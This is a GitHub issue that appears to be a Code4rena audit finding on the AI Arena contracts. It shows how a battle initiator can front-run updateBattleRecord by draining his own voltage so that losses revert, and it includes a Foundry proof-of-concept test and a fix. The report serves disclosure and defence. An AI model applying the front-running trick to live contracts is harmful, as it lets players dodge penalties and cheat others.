### ISSUE TITLE
The user could avoid loss by depleting his voltage.

### ISSUE THREAD

**Issue by c4-bot-10** [code-423n4/2024-02-ai-arena-findings#1741]
# Lines of code

https://github.com/code-423n4/2024-02-ai-arena/blob/cd1a0e6d1b40168657d1aaee8223dc050e15f8cc/src/RankedBattle.sol#L346
https://github.com/code-423n4/2024-02-ai-arena/blob/cd1a0e6d1b40168657d1aaee8223dc050e15f8cc/src/VoltageManager.sol#L105-L112

# Vulnerability details

## Impact
The user could avoid loss by depleting his voltage before every `updateBattleRecord` call that would result in a loss.
## Proof of Concept
A game server will publish the battle results on the chain by calling an `updateBattleRecord` and providing relevant values as parameters. The battle could either end in a win, tie, or loss. The win and tie are good for the battle initiator as he doesn't lose anything. 

In case of a loss, user will lose points if he has any or he will lose a part of a stake. If the user is the initiator of the battle, then he can prevent a loss from happening by `depleting his voltage` with a frontrun call.

```solidity
function updateBattleRecord(
    uint256 tokenId,
    uint256 mergingPortion,
    uint8 battleResult,
    uint256 eloFactor,
    bool initiatorBool
)
    external
{
   ...
    _updateRecord(tokenId, battleResult);
    ...
    if (initiatorBool) {
        _voltageManagerInstance.spendVoltage(fighterOwner, VOLTAGE_COST);   <- WANTS TO SPEND VOLTAGE
    }

    totalBattles += 1;
}
```

A user could frontrun this call with a `spendVoltage` call and replenish (if possible) and drain the voltage below the amount needed for the execution of the above call.

```solidity
function spendVoltage(address spender, uint8 voltageSpent) public {
    require(spender == msg.sender || allowedVoltageSpenders[msg.sender]);
    if (ownerVoltageReplenishTime[spender] <= block.timestamp) {
        _replenishVoltage(spender);
    }

    ownerVoltage[spender] -= voltageSpent;
    emit VoltageRemaining(spender, ownerVoltage[spender]);
}
```

#### Coded POC
Add test to the `RankedBattle.t.sol` and run with `forge test --match-path ./test/RankedBattle.t.sol -vvv`

```solidity
function testDepleteVoltage() public {
    address staker = vm.addr(3);
    _fundUserWith4kNeuronByTreasury(staker);
    _mintFromMergingPool(staker);

    uint256 stakeAmount = 3_000 * 10 ** 18;
    uint256 tokenId = 0;

    uint8 win = 0;
    uint8 loss = 2;

    vm.prank(staker);
    _rankedBattleContract.stakeNRN(stakeAmount, tokenId);

    // User wins
    vm.prank(address(_GAME_SERVER_ADDRESS));
    _rankedBattleContract.updateBattleRecord(tokenId, 50, win, 1500, true);

    // Voltage is at 90 because of the win
    uint8 remainingVoltage = _voltageManagerContract.ownerVoltage(staker);
    assertEq(remainingVoltage, 90);

    // User depletes his voltage to 0
    vm.prank(staker);
    _voltageManagerContract.spendVoltage(staker, remainingVoltage);

    assertEq(_voltageManagerContract.ownerVoltage(staker), 0);

    // User losses, the call now reverts as his voltage is 0
    vm.expectRevert();
    vm.prank(address(_GAME_SERVER_ADDRESS));
    _rankedBattleContract.updateBattleRecord(tokenId, 50, loss, 1500, true);
}
```
## Tools Used
Manual review
## Recommended Mitigation Steps
Prevent user spending voltage outside of battles.

## Assessed type

Other
